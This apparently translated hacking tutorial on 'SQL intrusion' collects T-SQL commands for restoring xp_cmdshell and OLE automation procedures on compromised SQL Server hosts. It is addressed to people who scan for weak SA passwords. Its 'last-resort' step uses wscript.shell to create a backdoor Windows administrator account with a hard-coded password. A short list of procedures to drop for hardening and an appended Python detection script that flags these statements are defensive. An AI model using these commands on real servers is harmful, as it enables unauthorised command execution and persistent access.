SQL intrusion: summary of methods for restoring xp_cmdshell

Source: Internet
Author: User

1433 SQL intrusion: summary of methods for restoring xp_cmdshell
How to enable xp_cmdshell in SQL Server 2005:
Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'xp_cmdshell', 1; reconfigure;

How to enable 'openrowset' in SQL Server 2005:
Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'ad hoc distributed queries', 1; reconfigure;

How to enable 'sp_oacreate' in SQL Server 2005:
Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'ole automation procedures', 1; reconfigure;

Overcoming common difficulties with the SA account
Restoring xp_cmdshell execution in common cases
1. Could not find stored procedure 'master..xpcmdshell'.
Recovery method: after connecting with Query Analyzer,
Step 1: Execute exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll' declare @o int
Step 2: Execute sp_addextendedproc 'xp_cmdshell', 'sql70.dll'
Then press F5 to execute the commands.
2. Unable to load DLL xpsql70.dll or a DLL referenced by it. Reason: 126 (The specified module could not be found.)
Recovery method: after connecting with Query Analyzer,
Step 1: Execute sp_dropextendedproc "xp_cmdshell"
Step 2: Execute sp_addextendedproc 'xp_cmdshell', 'sql70.dll'
Then press F5 to execute the commands.
3. The function xp_cmdshell could not be found in the library xpweb70.dll. Reason: 127 (The specified procedure could not be found.)
Recovery method: after connecting with Query Analyzer,
Step 1: Execute exec sp_dropextendedproc 'xp_cmdshell'
Step 2: Execute exec sp_addextendedproc 'xp_cmdshell', 'xpweb70.dll'
Then press F5 to execute the commands.
4. Last-resort method.
If none of the above methods works, try the following method to add an account:
After connecting with Query Analyzer,
Windows 2000 Server:
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net user Dell huxifeng007/add'
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ winnt \ system32 \ cmd.exe/C net localgroup administrators Dell/add'

Windows XP or Server 2003:
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net user Dell huxifeng007/add'
Declare @ shell int exec sp_oacreate 'wscript. shell ', @ shell output exec sp_oamethod @ shell, 'run', null, 'c: \ windows \ system32 \ cmd.exe/C net localgroup administrators Dell/add'

--------------
New method for restoring xp_cmdshell
Delete
Drop procedure sp_addextendedproc
Drop procedure sp_oacreate
Exec sp_dropextendedproc 'xp_cmdshell'

Restore
DBCC addextendedproc ("sp_oacreate", "odsole70.dll")
DBCC addextendedproc ("xp_cmdshell", "xplog70.dll")

In this way, the procedures can be restored directly, regardless of whether sp_addextendedproc exists.
-----------------------------
Statement to delete the xp_cmdshell extended stored procedure:
Exec sp_dropextendedproc 'xp_cmdshell'

SQL statement to restore xp_cmdshell:
Exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

SQL statement to enable xp_cmdshell:
Exec sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

Check whether the extended stored procedure exists:
Select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'
If the returned result is 1, it is OK.
Restore xp_cmdshell:
Exec master.dbo.addextendedproc 'xp_cmdshell', 'xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype = 'X' and name = 'xp_cmdshell'
If the returned result is 1, it is OK.
Otherwise, upload xplog70.dll.
Exec master.dbo.addextendedproc 'xp_cmdshell', 'c:\winnt\system32\xplog70.dll'

SQL statement to block xp_cmdshell:
sp_dropextendedproc "xp_cmdshell"
----------------
Delete dangerous stored procedures:
Drop procedure sp_makewebtask
Exec master..sp_dropextendedproc xp_cmdshell
Exec master..sp_dropextendedproc xp_dirtree
Exec master..sp_dropextendedproc xp_fileexist
Exec master..sp_dropextendedproc xp_terminate_process
Exec master..sp_dropextendedproc sp_oamethod
Exec master..sp_dropextendedproc sp_oacreate
Exec master..sp_dropextendedproc xp_regaddmultistring
Exec master..sp_dropextendedproc xp_regdeletekey
Exec master..sp_dropextendedproc xp_regdeletevalue
Exec master..sp_dropextendedproc xp_regenumkeys
Exec master..sp_dropextendedproc xp_regenumvalues
Exec master..sp_dropextendedproc sp_add_job
Exec master..sp_dropextendedproc sp_addtask
Exec master..sp_dropextendedproc xp_regread
Exec master..sp_dropextendedproc xp_regwrite
Exec master..sp_dropextendedproc xp_readwebtask
Exec master..sp_dropextendedproc xp_makewebtask
Exec master..sp_dropextendedproc xp_regremovemultistring
Exec master..sp_dropextendedproc sp_oacreate
Drop procedure sp_addextendedproc

Restoring the extended stored procedures

Restore sp_addextendedproc first. The statement is as follows:
Create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517), /* (owner.)name of function to call */
@dllname varchar(255) /* name of DLL containing function */
As
Set implicit_transactions off
If @@trancount > 0
Begin
Raiserror (15002, -1, -1, 'sp_addextendedproc')
Return (1)
End
DBCC addextendedproc (@functname, @dllname)
Return (0) -- sp_addextendedproc
Go

Restore all of the extended stored procedures above:
Use master
Exec sp_addextendedproc xp_cmdshell, 'xp_cmdshell.dll'
Exec sp_addextendedproc xp_dirtree, 'xpstar.dll'
Exec sp_addextendedproc xp_enumgroups, 'xplog70.dll'
Exec sp_addextendedproc xp_fixeddrives, 'xpstar.dll'
Exec sp_addextendedproc xp_loginconfig, 'xplog70.dll'
Exec sp_addextendedproc xp_enumerrorlogs, 'xpstar.dll'
Exec sp_addextendedproc xp_getfiledetails, 'xpstar.dll'
Exec sp_addextendedproc sp_oacreate, 'odsole70.dll'
Exec sp_addextendedproc sp_oadestroy, 'odsole70.dll'
Exec sp_addextendedproc sp_oageterrorinfo, 'odsole70.dll'
Exec sp_addextendedproc sp_oagetproperty, 'odsole70.dll'
Exec sp_addextendedproc sp_oamethod, 'odsole70.dll'
Exec sp_addextendedproc sp_oasetproperty, 'odsole70.dll'
Exec sp_addextendedproc sp_oastop, 'odsole70.dll'
Exec sp_addextendedproc xp_regaddmultistring, 'xpstar.dll'
Exec sp_addextendedproc xp_regdeletekey, 'xpstar.dll'
Exec sp_addextendedproc xp_regdeletevalue, 'xpstar.dll'
Exec sp_addextendedproc xp_regenumvalues, 'xpstar.dll'
Exec sp_addextendedproc xp_regread, 'xpstar.dll'
Exec sp_addextendedproc xp_regremovemultistring, 'xpstar.dll'
Exec sp_addextendedproc xp_regwrite, 'xpstar.dll'
Exec sp_addextendedproc xp_availablemedia, 'xpstar.dll'

SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.
Friends who often scan for weak SQL passwords should have encountered this problem!
Next, use an SQL statement.
The statement to execute in Query Analyzer:
Exec sp_configure 'show advanced options', 1; reconfigure; Exec sp_configure 'xp_cmdshell', 1; reconfigure
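
Detection logic for the statements collected on this page, added here as an example and not part of the original article: it strips comments, case, quoting style and whitespace from captured T-SQL so that spaced or re-quoted variants still match, then flags statements that switch on the three sp_configure options, re-register extended procedures, recreate the sp_addextendedproc helper, or create a wscript.shell object. The rule names, the functions normalise and scan, and the sample trace are constructed for illustration.

```python
import re

# Rule name -> pattern, matched against the flattened statement (see normalise).
RULES = {
    # sp_configure switching one of the three options from this page to 1
    "config_enabled": re.compile(
        r"sp_configuren?'(xp_cmdshell|oleautomationprocedures"
        r"|adhocdistributedqueries)',1(?!\d)"),
    # sp_addextendedproc / DBCC addextendedproc registering an xp_* or sp_OA* proc
    "xproc_registered": re.compile(r"addextendedproc\(?n?'?(xp_\w+|sp_oa\w+)"),
    # the sp_addextendedproc helper being recreated after it was dropped
    "helper_recreated": re.compile(r"createprocedure(?:dbo\.)?sp_addextendedproc"),
    # OLE automation used to instantiate a shell object
    "ole_shell_object": re.compile(r"sp_oacreaten?'wscript\.shell'"),
}

def normalise(stmt: str) -> str:
    """Drop comments, case, brackets and all whitespace; unify quote style."""
    stmt = re.sub(r"/\*.*?\*/", "", stmt, flags=re.S)   # block comments
    stmt = re.sub(r"--[^\n]*", "", stmt)                # line comments
    stmt = stmt.lower().replace('"', "'").replace("[", "").replace("]", "")
    return re.sub(r"\s+", "", stmt)

def scan(statements):
    """Return [(index, sorted rule names)] for statements matching any rule."""
    hits = []
    for i, stmt in enumerate(statements):
        flat = normalise(stmt)
        names = sorted(n for n, rx in RULES.items() if rx.search(flat))
        if names:
            hits.append((i, names))
    return hits

# Constructed trace lines, modelled on the statements shown on this page.
SAMPLE_TRACE = [
    "SELECT name FROM sys.databases",
    "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "exec  SP_CONFIGURE 'xp_cmdshell', 0; reconfigure",   # disabling: not flagged
    'DBCC addextendedproc ("xp_cmdshell", "xplog70.dll")',
    "EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'",
    "DECLARE @shell int EXEC sp_oacreate 'wscript.shell', @shell OUTPUT",
    "EXEC master..sp_dropextendedproc xp_cmdshell",        # hardening: not flagged
]

if __name__ == "__main__":
    for index, names in scan(SAMPLE_TRACE):
        print(index, names)
```

The rules only cover the positional call forms shown on this page; sp_configure invoked with named parameters would need an additional pattern.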
